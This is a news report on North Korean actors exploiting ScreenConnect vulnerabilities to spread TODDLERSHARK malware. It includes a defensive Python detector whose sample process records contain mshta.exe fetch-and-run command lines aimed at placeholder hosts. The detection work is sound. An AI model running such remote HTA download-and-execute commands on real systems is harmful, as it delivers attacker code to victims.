Cybercriminals Use ConnectWise ScreenConnect Vulnerabilities to Spread TODDLERSHARK Malware
Threat actors from North Korea have been exploiting the newly disclosed vulnerabilities in ConnectWise ScreenConnect to distribute a new piece of malware known as TODDLERSHARK.
Research published by Kroll and shared with The Hacker News states that TODDLERSHARK shares similarities with known Kimsuky malware, including BabyShark and ReconShark.
Security researchers Dave Truman, George Glass, and Keith Wojcieszek said that “the threat actor gained access to the victim workstation by exploiting the exposed setup wizard of the ScreenConnect application.”
“They then leveraged their now ‘hands on keyboard’ access to use cmd.exe to execute mshta.exe with a URL to the Visual Basic (VB) based malware.”
The aforementioned ConnectWise vulnerabilities, identified as CVE-2024-1708 and CVE-2024-1709, were discovered last month and have since been extensively exploited by various threat actors to distribute ransomware, stealer malware, cryptocurrency miners, and remote access trojans.
APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (formerly Thallium), KTA082, Nickel Kimball, and Velvet Chollima are just a few of the aliases that Kimsuky goes by. It has been adding tools to its malware arsenal over time, the most recent being GoBear and Troll Stealer.
BabyShark, first observed in late 2018, is launched via an HTML Application (HTA) file. Once executed, the VB script-based malware persists on the system, waits for further instructions from the operator, and exfiltrates system data to a command-and-control (C2) server.
Then, in May 2023, a BabyShark variant called ReconShark was observed being delivered via spear-phishing emails to specifically targeted individuals. Based on its code and behavior, TODDLERSHARK is believed to be the latest evolution of the same malware.
In addition to using a scheduled job for persistence, the malware is designed to obtain and exfiltrate private data from the affected computers, serving as an effective reconnaissance instrument.
TODDLERSHARK “exhibits elements of polymorphic behavior in the form of changing identity strings in code, changing the position of code via generated junk code, and using uniquely generated C2 URLs, which could make this malware hard to detect in some environments,” according to the researchers.
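Because the VB payload itself mutates, a more durable detection keys on the delivery chain described above (a ScreenConnect process spawning cmd.exe, which launches mshta.exe with a URL). The following is an added example, not code from Kroll's research or the article; the process records, paths and URLs are constructed, and the URL regex and severity rules are assumptions.

```python
import re
from dataclasses import dataclass

# Any http(s) URL on the command line: mshta.exe will fetch and run a remote HTA.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

@dataclass
class ProcEvent:
    """Minimal process-creation record (hypothetical EDR/Sysmon-style shape)."""
    pid: int
    ppid: int
    image: str
    cmdline: str

def basename(path):
    return path.lower().replace("/", "\\").rsplit("\\", 1)[-1]

def ancestry(events, pid, max_depth=6):
    """Image basenames from the given process up through its parents."""
    by_pid = {e.pid: e for e in events}
    chain, cur = [], by_pid.get(pid)
    while cur is not None and len(chain) < max_depth:
        chain.append(basename(cur.image))
        cur = by_pid.get(cur.ppid)
    return chain

def detect_remote_hta(events):
    """Flag mshta.exe launched with a URL; raise severity when a ScreenConnect
    process appears anywhere in the parent chain (the access path on this page)."""
    alerts = []
    for e in events:
        if basename(e.image) != "mshta.exe":
            continue
        m = URL_RE.search(e.cmdline)
        if not m:
            continue  # local .hta files are common and not this pattern
        chain = ancestry(events, e.pid)
        via_screenconnect = any("screenconnect" in p for p in chain[1:])
        alerts.append({"pid": e.pid, "url": m.group(0), "chain": " <- ".join(chain),
                       "severity": "high" if via_screenconnect else "medium"})
    return alerts

# Constructed sample telemetry (not real events); ".invalid" hosts are placeholders.
SAMPLE_EVENTS = [
    ProcEvent(100, 4, r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe", "ScreenConnect.ClientService.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe /c mshta.exe http://malicious.invalid/x.hta"),
    ProcEvent(300, 200, r"C:\Windows\System32\mshta.exe", "mshta.exe http://malicious.invalid/x.hta"),
    ProcEvent(400, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(500, 400, r"C:\Windows\System32\mshta.exe", r'mshta.exe "C:\Program Files\Vendor\setup.hta"'),
    ProcEvent(600, 400, r"C:\Windows\System32\mshta.exe", "mshta.exe https://example.invalid/page.hta"),
]

if __name__ == "__main__":
    for alert in detect_remote_hta(SAMPLE_EVENTS):
        print(alert)
```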
The discovery coincides with accusations made by the National Intelligence Service (NIS) of South Korea against its northern equivalent for reportedly breaking into the computers of two local semiconductor firms, who have not been identified, and stealing sensitive information.
The cyberattacks occurred between December 2023 and February 2024. The threat actors reportedly first gained access to internet-facing servers that were deemed vulnerable, then used living-off-the-land (LotL) techniques rather than dropping malware in order to evade detection.
“North Korea may have begun preparations for its own production of semiconductors due to difficulties in procuring semiconductors due to sanctions against North Korea and increased demand due to the development of weapons such as satellite missiles,” NIS said.